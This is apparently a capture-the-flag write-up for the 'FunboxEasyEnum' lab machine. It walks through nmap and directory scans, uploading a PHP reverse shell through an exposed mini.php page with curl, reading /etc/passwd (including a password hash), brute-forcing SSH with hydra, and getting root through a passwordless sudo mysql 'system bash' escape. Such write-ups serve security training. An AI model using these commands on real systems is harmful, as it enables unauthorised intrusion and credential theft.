FunboxEasyEnum - Easy

Nmap Scan

┌─[sheinn101@parrot]─[~/offsec/FunboxEasyEnum]
└──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 192.168.129.132
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-06 22:37 +0630
Nmap scan report for 192.168.129.132
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9c:52:32:5b:8b:f6:38:c7:7f:a1:b7:04:85:49:54:f3 (RSA)
|   256 d6:13:56:06:15:36:24:ad:65:5e:7a:a1:8c:e5:64:f4 (ECDSA)
|_  256 1b:a9:f3:5a:d0:51:83:18:3a:23:dd:c4:a9:be:59:f0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.57 seconds

Directory Scan

[22:40:51] 200 -   11KB - /index.html                                                                                                     
[22:40:53] 301 -  323B  - /javascript  ->  http://192.168.129.132/javascript/                
[22:41:10] 200 -   13KB - /phpmyadmin/doc/html/index.html                                                                                   
[22:41:11] 301 -  323B  - /phpmyadmin  ->  http://192.168.129.132/phpmyadmin/
[22:41:14] 200 -   10KB - /phpmyadmin/index.php                                                 
[22:41:14] 200 -   10KB - /phpmyadmin/
[22:41:19] 200 -   21B  - /robots.txt                                                                                  
[22:41:21] 403 -  280B  - /server-status                                                                                       
[22:41:21] 403 -  280B  - /server-status/
[22:41:21] 403 -  280B  - /mini.php

In robots.txt

In mini.php , we get a shell to upload files.

Uploading Reverse Shell

In Linux php-reverse-shell.php is already builtin, so you can find with this command

locate php-reverse-shell.php

You can also upload with curl command

curl -s -F "file=@shell.php" http://IP/mini.php > /dev/null

When we uploaded shell, listen with nc and visit the url or run curl command

curl http://IP/shell.php

From /etc/passwd ,we got a user which is called goat

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
karla:x:1000:1000:karla:/home/karla:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
harry:x:1001:1001:,,,:/home/harry:/bin/bash
sally:x:1002:1002:,,,:/home/sally:/bin/bash
goat:x:1003:1003:,,,:/home/goat:/bin/bash
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh

As a easy box, we should brute force ssh that username with hydra

SSH Bruteforcing with Hydra

$ hydra -l goat -P /usr/share/wordlists/rockyou.txt $ip ssh

[DATA] attacking ssh://192.168.1.16:22/
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344223 to do in 1320:50h, 16 active
[STATUS] 134.67 tries/min, 404 tries in 00:03h, 14344000 to do in 1775:15h, 16 active
[STATUS] 117.29 tries/min, 821 tries in 00:07h, 14343583 to do in 2038:17h, 16 active
[22][ssh] host: 192.168.1.16   login: goat   password: thebest
1 of 1 target successfully completed, 1 valid password found

Now we got goat password and switch to that user.

www-data@funbox7:/$ su - goat
Password: thebest

goat@funbox7:~$ whoami;id
goat
uid=1003(goat) gid=1003(goat) groups=1003(goat),111(ssh)

Privilege Escalaption

Always try sudo -l first and we see mysql can run as root without password.

goat@funbox7:~$ sudo -l
Matching Defaults entries for goat on funbox7:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goat may run the following commands on funbox7:
    (root) NOPASSWD: /usr/bin/mysql

Type this command to get shell as root

goat@funbox7:~$ sudo mysql -s
mysql> system bash
root@funbox7:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

You can also use this one line command from GTFObin

sudo mysql -e '\! /bin/sh'

Now we pwned it

Last updated